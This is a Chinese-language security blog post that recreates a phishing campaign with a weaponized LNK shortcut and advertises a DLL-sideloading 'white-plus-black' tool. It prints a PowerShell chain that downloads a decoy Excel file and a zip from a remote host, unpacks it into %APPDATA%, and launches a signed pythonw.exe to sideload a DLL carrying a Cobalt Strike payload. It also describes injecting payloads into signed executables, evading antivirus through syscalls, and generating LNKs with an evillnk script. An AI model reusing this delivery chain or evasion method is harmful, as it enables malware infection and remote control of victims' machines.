正文

lnk快捷方式白加黑武器化

admin
admin V管理员 /0 评论 /115 阅读
0608
此篇文章发布距今已超过108天,您需要注意文章的内容或图片是否可用!

看下这篇文章,翻译过来是“UAC-0184的恶意软件活动使用XWORM RAT针对乌克兰,利用 Python 进行 DLL 侧加载。”[1]

依然是网络钓鱼ZIP压缩文件,内含lnk快捷方式NewCopy.xlsx.lnk,执行后,下载“pkg.zip”至%appdata%下,解压至创建的SecurityCheck的文件夹中,然后下载打开一个真的NewCopy.xlsx(诱饵Excel)文件。最后运行文件夹中的pythonw.exe通过DLL侧加载python310.dll,加载XWorm远控有效载荷上线。后面的Process Hollowing注入合法进程MSBuild就先不说了。

今天我们来看下这个操作。

技术采用

编号
技术
详细
版本
1
白加黑工具
《白加黑有效载荷注入工具》
发布
2
lnk快捷方式
《lnk快捷方式》
发布
3
cobaltstrike
暂无更新

lnk快捷方式

执行lnk后远程下载一个同名文档至temp目录,然后打开迷惑用户,下载pkg.zip,检查appdata是否存在SecurityCheck目录,不存在则创建,然后下载一个pkg.zip,解压至该目录,删除zip,启动白名单文件pythonw.exe,通过DLL侧加载方法加载名为python310.dll的恶意DLL,DLL加载pythonw.exe存储的cobaltstrike有效载荷。

部分代码:

'Invoke-WebRequest -Uri "http://192.168.136.143/NewCopy.xlsx" -OutFile "$env:TEMP\NewCopy.xlsx"; '  # 下载 Excel 文件到 Temp 目录'Start-Process -FilePath "$env:TEMP\NewCopy.xlsx";'  # 启动 Excel 文件'if (-Not (Test-Path "$env:APPDATA\SecurityCheck")) { New-Item -ItemType Directory -Path "$env:APPDATA\SecurityCheck" | Out-Null }; '  # 创建文件夹'Invoke-WebRequest -Uri "http://192.168.136.143/pkg.zip" -OutFile "$env:APPDATA\SecurityCheck\pkg.zip"; '  # 下载 ZIP 文件'Expand-Archive -Path "$env:APPDATA\SecurityCheck\pkg.zip" -DestinationPath "$env:APPDATA\SecurityCheck" -Force; '  # 解压 ZIP 文件'Remove-Item -Path "$env:APPDATA\SecurityCheck\pkg.zip" -Force; '  # 删除 ZIP 文件'Start-Process -FilePath "$env:APPDATA\SecurityCheck\pythonw.exe";'  # 执行程序

白加黑工具

传统白加黑通常将shellcode写入至dll中,但这样存在两个问题,一是文件熵值非常高,导致很容易被查杀。二是shellcode难以使用,越是复杂的C2,其shellcode将非常大,难以放置于普通加载器中使用,正因如此,在4.10版本的cobatstrike中,官方已将raw作为默认导出的有效载荷。由于我们的bin已使用插件进行了特征修补,我们需要使用bin格式作为有效载荷,而不是使用shellcode

数字签名通常是为了防止未经授权的修改,一旦文件被篡改,签名就会失效。但技术通常会颠覆你的认知,修改带签名的EXE后,签名可以仍然有效

这是python官方文件,将payload_x64.bin注入文件中。原文件100KB修改后533KB,数字签名依然有效。

由于pythonw.exe具备有效数字签名,杀毒软件默认放行。

dll采用系统调用,敏感函数命中大幅减少,难以被查杀。

dll熵值为5,看上去非常正常。

cobaltstrike

使用无视12款杀毒软件或沙箱。

视频效果

[视频区域]

使用方法

  1. 1. 一条命令将任意bin注入pythonw.exe,双击pythonw.exe即可上线,DLL中不含bin,DLL只需编译一次或无需编译。
  2. 2. 使用evillnk脚本生成lnk快捷方式,实现上述效果。

免责声明

本方案仅限授权测试使用,请遵守《网络安全法》相关规定,严禁任何形式的非法使用。

推荐阅读

  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 
  • • 

欢迎点赞分享并留言,同时欢迎关注视频号。

引用链接

[1] : https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网